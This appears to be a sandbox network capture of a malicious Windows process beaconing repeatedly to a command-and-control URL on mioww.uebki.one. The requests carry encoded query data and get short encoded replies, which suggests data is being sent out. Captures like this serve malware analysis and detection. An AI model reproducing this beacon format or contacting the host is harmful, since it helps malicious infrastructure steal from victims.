                              Aug 31, 2024 10:14:22.265259981 CEST2104OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=d1nIiojIkNmMkNjZzM2MjZGO3MTO4EWNkVWYyQDZ4EzMzUjZjJmIsISO3IWYycjY2ADOmBjMiJDOhBzYzMWOjJWMklDM0IjZ4UDM1UDZ3IDNiojIxEjY0QGZzYmYxI2M4QDM1MzN3EWM0EGZkNTN0kjMlFmIsISNwgTZ1ADMihjZjFTNxQGMxkDZyMDOhlzMiJzY5QWOiFGNycjYhFmMiojI1kDZkNTYwYTNiVmM5QGOyMTY5QGMwYmMmZmM1cDOjNmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFRKNETptWaiNTOtJmc1clVvFUa [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:14:22.996205091 CEST729INHTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:14:22 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X8HN1XOsvCj9CAGb8LCofX4wQOATBp14c6XDd6kEGGkTmUDLtrB796M43VZ%2B%2F1lMQkiQflfKbRYXR0BU0A%2BRWAA1i7FvexQt9axq8AoTtu2SiXABj42jUf%2BESi34ENgGIU4%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb910fafa78c8f-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              29192.168.2.449766188.114.97.3807632C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              TimestampBytes transferredDirectionData
                              Aug 31, 2024 10:14:28.015846014 CEST2131OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVG [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:14:28.572233915 CEST720INHTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:14:28 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CR9kWSi%2FSFn7kQPoGjiFUN4Uh%2FpzqpPuIgDxR7BGMVgrn4NsaNAJiNw4EkVJZQi7waDF9Nn0WhPhzjuTKmwbq1SW3M2kmyxSVS7eeQWnaWJlkIyE245HwnjAN1jLSw6Eog8%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb9133ad0142fc-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye
                              Aug 31, 2024 10:14:28.705043077 CEST5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              30192.168.2.449767188.114.97.3807632C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              TimestampBytes transferredDirectionData
                              Aug 31, 2024 10:14:33.718046904 CEST2107OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVG [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Aug 31, 2024 10:14:34.443567991 CEST731INHTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:14:34 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EG%2FQYyUaG1QGqGyNZiWOGXwbg3%2FantZrfJ02u8%2BEoc80KfdNkAvlFMzv%2Bs79UpXweXGVss5uhEl1kDI3R99x1Oyom68J7u6B4dFvi9Tw588wwf1LH9K%2FvcZVFittiZYFKm4%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb91574e577271-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              31192.168.2.449768188.114.97.3807632C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              TimestampBytes transferredDirectionData
                              Aug 31, 2024 10:14:39.452686071 CEST2131OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVG [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:14:40.161600113 CEST725INHTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:14:40 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TzFy1TzG7nD1JA9C2shUUyjdIWZfzRI9FboduDtlqt8jfeW6nVlfC%2FFoJXSVnpyegAkUWUIHfWG4txDfUSnXdreJeyLH8FbxrcAkpzTGnqI%2Ffwkp0vSQ6vaVXpDMF2NiO3s%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb917b1a8f8c8f-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              32192.168.2.449769188.114.97.3807632C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              TimestampBytes transferredDirectionData
                              Aug 31, 2024 10:14:45.172364950 CEST2131OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVG [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:14:45.912075043 CEST737INHTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:14:45 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nu8KLPpygcxt4K8gZHgAEo0TOd1K%2F3Cm%2F7%2F%2F7lg3o5luf8IFj%2BWND9KIifGCI5rSCoPN%2BvL0x8i9cDF%2FfufulcW1pMX3ihWduIuQutbcUX79%2BQ4OsgsPqbsAbp0XAdPJYQY%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb919ee9be7d02-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              33192.168.2.449770188.114.97.3807632C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              TimestampBytes transferredDirectionData
                              Aug 31, 2024 10:14:50.925854921 CEST2107OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVG [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Aug 31, 2024 10:14:51.694890976 CEST729INHTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:14:51 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O711hKaTqHjHmFIpgZvGbN1bKq7WPzjQ9UZAYRPaKmemv%2FRYUlCn7RGxMah8GxJ3hroCARAmSVBoIJ4%2B%2BjK9Ivn9D8RnEKOoZs%2Ft9LiuKwILDlhgWECl9Z9aP4jgbwOCmsA%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb91c2ed5a8c1e-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              34192.168.2.449771188.114.97.3807632C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              TimestampBytes transferredDirectionData
                              Aug 31, 2024 10:14:56.705468893 CEST2131OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVG [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:14:57.466830969 CEST729INHTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:14:57 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VEoWROtRPmd6o0fvJ2003rc9fYRyzxUcyu0pB%2BbDcxLErpJOnUJ5n47KBkBaDe8wniW7%2BiuHBN%2BgWkpatG1AxqaDNtMxPy6fE3mdpKG4q1sd305rjXP3qgrs%2F10aa4bpUz0%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb91e6f8ce42fe-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              35192.168.2.449772188.114.97.3807632C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              TimestampBytes transferredDirectionData
